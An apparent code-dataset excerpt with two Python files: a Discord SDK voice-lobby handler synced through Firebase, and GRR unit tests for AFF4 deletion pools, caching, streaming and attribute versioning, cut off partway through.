source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
discord_handler.py
|
import time
import os
import signal
import sys
import threading
import json
import math
import discordsdk as dsdk
from firebase_handler import FirebaseHandler
APP_ID = 799831774959763488
def dummy_callback(result, *args):
if result != dsdk.Result.ok:
raise Exception(result)
class DiscordHandler:
def __init__(self):
self.app = dsdk.Discord(APP_ID, dsdk.CreateFlags.default)
self.lobby_manager = self.app.get_lobby_manager()
self.voice_manager = self.app.get_voice_manager()
self.user_manager = self.app.get_user_manager()
self.lobby_id = None
self.room_id = None
self.user_id = None
self.is_setup = False
self.last_coords = (2050, 500)
self.color_mapping = {}
self.lobby_manager.on_member_connect = self.on_member_connect
self.lobby_manager.on_member_disconnect = self.on_member_disconnect
self.user_manager.on_current_user_update = self.on_curr_user_update
self.firebase = FirebaseHandler()
signal.signal(signal.SIGINT, self.signal_handler)
def setup(self, room_id):
if not self.is_setup:
print("ROOM_ID:", room_id)
self.is_setup = True
if self.firebase.db.child(room_id).get().val():
self.join_lobby(room_id)
else:
self.create_lobby(room_id)
def create_lobby(self, room_id):
print("creating lobby")
transaction = self.lobby_manager.get_lobby_create_transaction()
transaction.set_capacity(10)
transaction.set_type(dsdk.enum.LobbyType.public)
self.room_id = room_id
self.lobby_manager.create_lobby(transaction, self.create_lobby_callback)
def join_lobby(self, room_id):
self.room_id = room_id
activity_secret = self.firebase.db.child(room_id).child("activity_secret")
activity_secret = activity_secret.get().val()
self.lobby_manager.connect_lobby_with_activity_secret(activity_secret, self.connect_lobby_callback)
def disconnect(self):
self.lobby_manager.disconnect_voice(self.lobby_id, self.disconnect_voice_callback)
def create_lobby_callback(self, result, lobby):
print(result)
if result == dsdk.Result.ok:
self.lobby_id = lobby.id
activity_secret = self.lobby_manager.get_lobby_activity_secret(lobby.id)
self.firebase.db.child(self.room_id).update({"activity_secret": activity_secret})
print(f"created lobby {lobby.id} with secret {activity_secret}")
self.lobby_manager.connect_voice(self.lobby_id, self.connect_voice_callback)
else:
raise Exception(result)
def connect_lobby_callback(self, result, lobby):
if result == dsdk.Result.ok:
print(f"connected to lobby {lobby.id}")
self.lobby_id = lobby.id
self.lobby_manager.connect_voice(lobby.id, self.connect_voice_callback)
else:
raise Exception(result)
def connect_voice_callback(self, result):
if result == dsdk.Result.ok:
print(f"connected to voice!")
else:
raise Exception(result)
def disconnect_voice_callback(self, result):
if result == dsdk.Result.ok:
self.lobby_manager.disconnect_lobby(self.lobby_id, dummy_callback)
else:
raise Exception(result)
def adjust_user_volume(self, user_id, volume):
try:
if user_id != self.user_id:
self.voice_manager.set_local_volume(user_id, volume)
except Exception as e:
print("error adjusting volume", e)
def on_member_connect(self, lobby_id, user_id):
if lobby_id == self.lobby_id:
self.adjust_user_volume(user_id, 0)
print(f"{user_id} has joined the lobby!")
def on_member_disconnect(self, lobby_id, user_id):
if lobby_id == self.lobby_id:
print(f"{user_id} has left the lobby!")
def on_curr_user_update(self):
user = self.user_manager.get_current_user()
self.user_id = user.id
def update_color_map(self, color):
self.firebase.db.child(self.room_id).child("colors").update({color: str(self.user_id)})
def update_map_coords(self, x, y, color):
last_x, last_y = self.last_coords
distance = math.sqrt((x-last_x)**2 + (y-last_y)**2)
if distance < 250:
self.firebase.db.child(self.room_id).child("webapp").update({str(self.user_id): {"x": x, "y":y, "color": color}})
self.last_coords = (x, y)
print(x, y)
def signal_handler(self, signal, frame):
self.disconnect()
time.sleep(3)
sys.exit(0)
def run(self):
thread = threading.Thread(target=self._spin, daemon=True)
thread.start()
def _spin(self):
ticker = 0
while True:
time.sleep(1/10)
self.app.run_callbacks()
ticker += 1
if ticker == 10:
path = self.firebase.db.child(self.room_id).child("colors")
val = path.get().val()
self.color_mapping = val if val else {}
ticker = 0
if __name__ == "__main__":
dh = DiscordHandler()
dh.create_lobby()
dh.run()
while True:
time.sleep(1)
|
aff4_test.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Tests for the flow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import itertools
import os
import threading
import time
from absl import app
from future.builtins import range
from future.utils import iteritems
from future.utils import iterkeys
from future.utils import itervalues
import mock
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import flow
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.aff4_objects import collects
from grr_response_server.aff4_objects import standard as aff4_standard
from grr_response_server.data_stores import fake_data_store
# TODO(user): break the dependency cycle described in
# aff4_objects/standard.py and remove this import.
# pylint: disable=unused-import
from grr_response_server.flows.general import filesystem
# pylint: enable=unused-import
from grr.test_lib import aff4_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class ObjectWithLockProtectedAttribute(aff4.AFF4Volume):
"""Test object with a lock-protected attribute."""
class SchemaCls(aff4.AFF4Object.SchemaCls):
LOCK_PROTECTED_ATTR = aff4.Attribute(
"aff4:protected_attr",
rdfvalue.RDFString,
"SomeString",
lock_protected=True)
UNPROTECTED_ATTR = aff4.Attribute(
"aff4:unprotected_attr",
rdfvalue.RDFString,
"SomeString",
lock_protected=False)
class DeletionPoolTest(aff4_test_lib.AFF4ObjectTest):
"""Tests for DeletionPool class."""
def setUp(self):
super(DeletionPoolTest, self).setUp()
self.pool = aff4.DeletionPool(token=self.token)
def _CreateObject(self, urn, aff4_type):
with aff4.FACTORY.Create(urn, aff4_type, mode="w", token=self.token) as fd:
return fd
def testMarkForDeletionAddsObjectsToDeletionSet(self):
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a"))
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/b"))
self.assertEqual(
self.pool.urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/b")]))
def testMarkForDeletionAddsChildrenToDeletionSet(self):
self._CreateObject("aff4:/a", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/a/b", aff4.AFF4MemoryStream)
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a"))
self.assertEqual(
self.pool.urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/a/b")]))
def testMultiMarkForDeletionAddsMultipleObjectsToDeletionSet(self):
self.pool.MultiMarkForDeletion(
[rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/b")])
self.assertEqual(
self.pool.urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/b")]))
def testMultiMarkForDeletionAddsMultipleObjectsAndChildrenToDeletionSet(self):
self._CreateObject("aff4:/a", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/a/b", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/c", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/c/d", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/c/e", aff4.AFF4MemoryStream)
self.pool.MultiMarkForDeletion(
[rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/c")])
self.assertEqual(
self.pool.urns_for_deletion,
set([
rdfvalue.RDFURN("aff4:/a"),
rdfvalue.RDFURN("aff4:/a/b"),
rdfvalue.RDFURN("aff4:/c"),
rdfvalue.RDFURN("aff4:/c/d"),
rdfvalue.RDFURN("aff4:/c/e")
]))
def testReturnsEmptyListOfRootsWhenNoUrnsMarked(self):
self.assertEqual(self.pool.root_urns_for_deletion, set())
def testReturnsSingleRootIfTwoUrnsInTheSameSubtreeMarkedForDeletion(self):
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a"))
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a/b"))
self.assertEqual(self.pool.root_urns_for_deletion,
set([rdfvalue.RDFURN("/a")]))
def testReturnsTwoRootsIfTwoMarkedUrnsAreFromDifferentSubtrees(self):
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/a/b"))
self.pool.MarkForDeletion(rdfvalue.RDFURN("aff4:/b/c"))
self.assertEqual(
self.pool.root_urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a/b"),
rdfvalue.RDFURN("aff4:/b/c")]))
def testReturnsCorrectRootsForShuffledMarkForDeletionCalls(self):
urns = [
"aff4:/a/f", "aff4:/a/b", "aff4:/a/b/c", "aff4:/a/b/d", "aff4:/a/b/e"
]
for urns_permutation in itertools.permutations(urns):
pool = aff4.DeletionPool(token=self.token)
for urn in urns_permutation:
pool.MarkForDeletion(urn)
self.assertEqual(
pool.root_urns_for_deletion,
set([rdfvalue.RDFURN("aff4:/a/b"),
rdfvalue.RDFURN("aff4:/a/f")]))
def testOpenCachesObjectBasedOnUrnAndMode(self):
self._CreateObject("aff4:/obj", aff4.AFF4MemoryStream)
obj = self.pool.Open("aff4:/obj")
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4MemoryStream")
self._CreateObject("aff4:/obj", aff4.AFF4Volume)
obj = self.pool.Open("aff4:/obj")
# Check that we still get the old object from the cache.
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4MemoryStream")
# Check that request with different mode is not cached.
obj = self.pool.Open("aff4:/obj", mode="rw")
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4Volume")
def testOpenCachesObjectEvenIfRequestedAff4TypeIsWrong(self):
self._CreateObject("aff4:/obj", aff4.AFF4MemoryStream)
self.assertRaises(
IOError, self.pool.Open, "aff4:/obj", aff4_type=collects.GRRSignedBlob)
self._CreateObject("aff4:/obj", aff4.AFF4Volume)
obj = self.pool.Open("aff4:/obj")
# Check that the original object got cached and we do not make
# roundtrips to the datastore.
self.assertEqual(obj.Get(obj.Schema.TYPE), "AFF4MemoryStream")
def testMultiOpenCachesObjectsBasedOnUrnAndMode(self):
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/obj2", aff4.AFF4MemoryStream)
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4MemoryStream")
self._CreateObject("aff4:/obj1", aff4.AFF4Volume)
self._CreateObject("aff4:/obj2", aff4.AFF4Volume)
# Check that this result is still cached.
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4MemoryStream")
# Check that request with different mode is not cached.
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"], mode="rw"))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4Volume")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4Volume")
def testMultiOpenCachesObjectsEvenIfRequestedAff4TypeIsWrong(self):
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/obj2", aff4.AFF4MemoryStream)
result = list(
self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"],
aff4_type=collects.GRRSignedBlob))
self.assertFalse(result)
self._CreateObject("aff4:/obj1", aff4.AFF4Volume)
self._CreateObject("aff4:/obj2", aff4.AFF4Volume)
# Check that original objects got cached despite the fact that they didn't
# match the aff4_type in the original pool request.
result = list(self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self.assertEqual(result[1].Get(result[1].Schema.TYPE), "AFF4MemoryStream")
def testMultiOpenQueriesOnlyNonCachedObjects(self):
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
self._CreateObject("aff4:/obj2", aff4.AFF4MemoryStream)
result = list(self.pool.MultiOpen(["aff4:/obj1"]))
self.assertLen(result, 1)
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
self._CreateObject("aff4:/obj1", aff4.AFF4Volume)
self._CreateObject("aff4:/obj2", aff4.AFF4Volume)
result = dict((obj.urn.Basename(), obj)
for obj in self.pool.MultiOpen(["aff4:/obj1", "aff4:/obj2"]))
# Check that only previously uncached objects got fetched. Cached objects
# were left intact.
self.assertEqual(result["obj1"].Get(result["obj1"].Schema.TYPE),
"AFF4MemoryStream")
self.assertEqual(result["obj2"].Get(result["obj2"].Schema.TYPE),
"AFF4Volume")
def testMultiOpenDoesNotCacheNegativeResults(self):
result = list(self.pool.MultiOpen([""]))
self.assertFalse(result)
self._CreateObject("aff4:/obj1", aff4.AFF4MemoryStream)
result = list(self.pool.MultiOpen(["aff4:/obj1"]))
self.assertEqual(result[0].Get(result[0].Schema.TYPE), "AFF4MemoryStream")
def testListChildrenResultsAreCached(self):
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
result = self.pool.ListChildren("aff4:/a")
self.assertListEqual(result, ["aff4:/a/b"])
self._CreateObject("aff4:/a/c", aff4.AFF4Volume)
result = self.pool.ListChildren("aff4:/a")
# Check that the result was cached and newly created item is not reflected
# in the request.
self.assertListEqual(result, ["aff4:/a/b"])
def testMultiListChildrenResultsAreCached(self):
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
def testMultiListeChildreQueriesOnlyNonCachedUrns(self):
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
self._CreateObject("aff4:/b", aff4.AFF4Volume)
self._CreateObject("aff4:/b/c", aff4.AFF4Volume)
result = self.pool.MultiListChildren(["aff4:/a"])
self.assertEqual(result, {"aff4:/a": ["aff4:/a/b"]})
self._CreateObject("aff4:/a/foo", aff4.AFF4Volume)
self._CreateObject("aff4:/b/bar", aff4.AFF4Volume)
# Check that cached children lists are not refetched.
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {
"aff4:/a": ["aff4:/a/b"],
"aff4:/b": ["aff4:/b/bar", "aff4:/b/c"]
})
def testRecursiveMultiListChildrenResultsAreCached(self):
result = self.pool.RecursiveMultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
result = self.pool.MultiListChildren(["aff4:/a", "aff4:/b"])
self.assertEqual(result, {"aff4:/a": [], "aff4:/b": []})
def testRecursiveMultiListChildrenQueriesOnlyNonCachedUrns(self):
self._CreateObject("aff4:/a", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b/c", aff4.AFF4Volume)
# This should put aff4:/a and aff4:/a/b into the cache.
# Note that there's aff4:/a/b/c children were not queried and cached.
self.pool.MultiListChildren(["aff4:/a", "aff4:/a/b"])
self._CreateObject("aff4:/a/foo", aff4.AFF4Volume)
self._CreateObject("aff4:/a/b/c/d", aff4.AFF4Volume)
# aff4:/a children were cached, so aff4:/a/foo won't be present in
# the results. On the other hand, aff4:/a/b/c/d should be in the
# results because children of aff4:/a/b/c weren't queried and cached.
result = self.pool.RecursiveMultiListChildren(["aff4:/a"])
self.assertEqual(
result, {
"aff4:/a": ["aff4:/a/b"],
"aff4:/a/b": ["aff4:/a/b/c"],
"aff4:/a/b/c": ["aff4:/a/b/c/d"],
"aff4:/a/b/c/d": []
})
@mock.patch.object(aff4.AFF4Stream, "MULTI_STREAM_CHUNK_SIZE", 10)
class AFF4MemoryStreamTest(aff4_test_lib.AFF4ObjectTest):
"""Tests for AFF4MemoryStream class."""
# Tests below effectively test default AFF4Stream._MultiStream implementation.
def testMultiStreamStreamsSingleFileWithSingleChunk(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"123456789")
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd]))
self.assertLen(chunks_fds, 1)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd)
def testMultiStreamStreamsSinglfeFileWithTwoChunks(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 2)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"abcd")
self.assertIs(chunks_fds[1][0], fd2)
def testMultiStreamStreamsTwoFilesWithTwoChunksInEach(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"*" * 10 + b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"*" * 10 + b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 4)
self.assertEqual(chunks_fds[0][1], b"*" * 10)
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"123456789")
self.assertIs(chunks_fds[1][0], fd1)
self.assertEqual(chunks_fds[2][1], b"*" * 10)
self.assertIs(chunks_fds[2][0], fd2)
self.assertEqual(chunks_fds[3][1], b"abcd")
self.assertIs(chunks_fds[3][0], fd2)
class AFF4ImageTest(aff4_test_lib.AFF4ObjectTest):
"""Tests for AFF4Image class."""
# Tests below effectively test AFF4ImageBase._MultiStream implementation.
def testMultiStreamStreamsSingleFileWithSingleChunk(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"123456789")
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd]))
self.assertLen(chunks_fds, 1)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd)
def testMultiStreamStreamsSinglfeFileWithTwoChunks(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 2)
self.assertEqual(chunks_fds[0][1], b"123456789")
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"abcd")
self.assertIs(chunks_fds[1][0], fd2)
def testMultiStreamStreamsTwoFilesWithTwoChunksInEach(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 4)
self.assertEqual(chunks_fds[0][1], b"*" * 10)
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"123456789")
self.assertIs(chunks_fds[1][0], fd1)
self.assertEqual(chunks_fds[2][1], b"*" * 10)
self.assertIs(chunks_fds[2][0], fd2)
self.assertEqual(chunks_fds[3][1], b"abcd")
self.assertIs(chunks_fds[3][0], fd2)
def testMultiStreamChunkIsMissing(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000000", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
received_fd, chunk, e = list(aff4.AFF4Stream.MultiStream([fd]))[0]
self.assertIsNotNone(e)
self.assertIsNone(chunk)
self.assertEqual(received_fd, fd)
self.assertEqual(e.missing_chunks, ["aff4:/foo/0000000000"])
def testMultiStreamIgnoresTheFileIfAnyChunkIsMissingInReadAheadChunks(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000000", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
count = 0
for _, _, e in aff4.AFF4Stream.MultiStream([fd]):
if e is None:
count += 1
self.assertEqual(count, 0)
@mock.patch.object(aff4.AFF4Image, "MULTI_STREAM_CHUNKS_READ_AHEAD", 1)
def testMultiStreamTruncatesBigFileIfLasthunkIsMissing(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000001", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
content = []
got_exception = False
for fd, chunk, e in aff4.AFF4Stream.MultiStream([fd]):
if e is None:
content.append(chunk)
else:
got_exception = True
self.assertEqual(content, [b"*" * 10])
self.assertTrue(got_exception)
@mock.patch.object(aff4.AFF4Image, "MULTI_STREAM_CHUNKS_READ_AHEAD", 1)
def testMultiStreamSkipsBigFileIfFirstChunkIsMissing(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
aff4.FACTORY.Delete("aff4:/foo/0000000000", token=self.token)
fd = aff4.FACTORY.Open("aff4:/foo", token=self.token)
count = 0
for _, _, e in aff4.AFF4Stream.MultiStream([fd]):
if e is None:
count += 1
self.assertEqual(count, 0)
@mock.patch.object(aff4.AFF4Stream, "MULTI_STREAM_CHUNK_SIZE", 10)
class AFF4StreamTest(aff4_test_lib.AFF4ObjectTest):
def testMultiStreamStreamsObjectsOfVariousTypes(self):
with aff4.FACTORY.Create(
"aff4:/foo", aff4_type=aff4.AFF4Image, token=self.token) as fd:
fd.SetChunksize(10)
fd.Write(b"*" * 10 + b"123456789")
with aff4.FACTORY.Create(
"aff4:/bar", aff4_type=aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"*" * 10 + b"abcd")
fd1 = aff4.FACTORY.Open("aff4:/foo", token=self.token)
fd2 = aff4.FACTORY.Open("aff4:/bar", token=self.token)
chunks_fds = list(aff4.AFF4Stream.MultiStream([fd1, fd2]))
self.assertLen(chunks_fds, 4)
# We don't know the order in advance, because files are grouped in groups
# by file type and the order of these groups is random (although the order
# of files within each group is the same as in files list passed to the
# MultiStream call).
if chunks_fds[0][0] == fd2:
chunks_fds = chunks_fds[2:] + chunks_fds[:2]
self.assertEqual(chunks_fds[0][1], b"*" * 10)
self.assertIs(chunks_fds[0][0], fd1)
self.assertEqual(chunks_fds[1][1], b"123456789")
self.assertIs(chunks_fds[1][0], fd1)
self.assertEqual(chunks_fds[2][1], b"*" * 10)
self.assertIs(chunks_fds[2][0], fd2)
self.assertEqual(chunks_fds[3][1], b"abcd")
self.assertIs(chunks_fds[3][0], fd2)
class AFF4Test(aff4_test_lib.AFF4ObjectTest):
"""Test the AFF4 abstraction."""
def testCreatingObjectWithMutationPoolExpiresTheCacheCorrectly(self):
urn = rdfvalue.RDFURN("aff4:/foo/bar")
# Create a child below the urn, so that the urn gets initialized
# as an AFF4Volume and corresponding index entry is written.
with aff4.FACTORY.Create(
urn.Add("child"), aff4_type=aff4.AFF4Volume, token=self.token) as _:
pass
mutation_pool = data_store.DB.GetMutationPool()
with mutation_pool:
with aff4.FACTORY.Create(
urn,
mutation_pool=mutation_pool,
aff4_type=ObjectWithLockProtectedAttribute,
token=self.token) as _:
pass
# As the write operation sits in the pool, we should get an empty
# object (i.e. an AFF4Volume) here. This object will be cached by
# AFF4 cache.
obj = aff4.FACTORY.Open(urn, token=self.token)
self.assertEqual(obj.__class__, aff4.AFF4Volume)
# Even though the object's AFF4 entry should be expired when the
# new version is written, the code doesn't take mutations pool into
# account, so the expiry operation happens before we actually write
# the data into the datastore. That's why the AFF4 cache doesn't
# get invalidated correctly and we get stuck with AFF4Volume object
# type in cache.
obj = aff4.FACTORY.Open(urn, token=self.token)
# TODO(user): The check below doesn't pass. This is a bad bug, we
# should either get rid of AFF4 cache, or make it work nicely with
# mutation pools.
# self.assertEqual(obj.__class__, ObjectWithLockProtectedAttribute)
def testNonVersionedAttribute(self):
"""Test that non versioned attributes work."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
# We update the client hostname twice - Since hostname is versioned we
# expect two versions of this object.
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
client_fd = aff4.FACTORY.Open(
self.client_id, age=aff4.ALL_TIMES, token=self.token)
# Versions are represented by the TYPE attribute.
versions = list(client_fd.GetValuesForAttribute(client_fd.Schema.TYPE))
self.assertLen(versions, 2)
# Now update the CLOCK attribute twice. Since CLOCK is not versioned, this
# should not add newer versions to this object.
client.Set(client.Schema.CLOCK())
client.Flush()
client.Set(client.Schema.CLOCK())
client.Flush()
client_fd = aff4.FACTORY.Open(
self.client_id, age=aff4.ALL_TIMES, token=self.token)
# Versions are represented by the TYPE attribute.
new_versions = list(client_fd.GetValuesForAttribute(client_fd.Schema.TYPE))
self.assertEqual(versions, new_versions)
# There should also only be one clock attribute
clocks = list(client_fd.GetValuesForAttribute(client_fd.Schema.CLOCK))
self.assertLen(clocks, 1)
self.assertEqual(clocks[0].age, 0)
fd = aff4.FACTORY.Create("aff4:/foobar", aff4.AFF4Image, token=self.token)
fd.Set(fd.Schema._CHUNKSIZE(1))
fd.Set(fd.Schema._CHUNKSIZE(200))
fd.Set(fd.Schema._CHUNKSIZE(30))
fd.Flush()
fd = aff4.FACTORY.Open("aff4:/foobar", mode="rw", token=self.token)
self.assertEqual(fd.Get(fd.Schema._CHUNKSIZE), 30)
def testGetVersions(self):
"""Test we can retrieve versions."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
# Update the hostname twice, expect two versions of this object.
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
client.Set(client.Schema.HOSTNAME("client2"))
client.Flush()
# Now create as a different type.
vfsfile = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSFile, mode="w", token=self.token)
vfsfile.Flush()
for diffs_only in [False, True]:
ver_list = list(
aff4.FACTORY.OpenDiscreteVersions(
self.client_id, diffs_only=diffs_only, token=self.token))
self.assertLen(ver_list, 3)
v1, v2, v3 = ver_list
self.assertIsInstance(v1, aff4_grr.VFSGRRClient)
self.assertIsInstance(v2, aff4_grr.VFSGRRClient)
self.assertIsInstance(v3, aff4_grr.VFSFile)
self.assertTrue(
int(v1.Get(v1.Schema.TYPE).age) < int(v2.Get(v2.Schema.TYPE).age))
self.assertTrue(
int(v2.Get(v1.Schema.TYPE).age) < int(v3.Get(v2.Schema.TYPE).age))
self.assertEqual(str(v1.Get(v1.Schema.HOSTNAME)), "client1")
self.assertEqual(str(v2.Get(v2.Schema.HOSTNAME)), "client2")
self.assertFalse(v3.Schema.HOSTNAME)
def _CheckAFF4AttributeDefaults(self, client):
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertEqual(
client.Get(client.Schema.DOESNOTEXIST, "mydefault"), "mydefault")
self.assertEqual(
client.Get(client.Schema.DOESNOTEXIST, default="mydefault"),
"mydefault")
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST, None), None)
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST, default=None), None)
def testGetBadAttribute(self):
"""Test checking of non-existent attributes."""
# Check behaviour when we specify a type
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Flush()
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
# This should raise since we specified a aff4_type in Create
self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Check we get the same result from the existing object code path in create
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="rw", token=self.token)
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
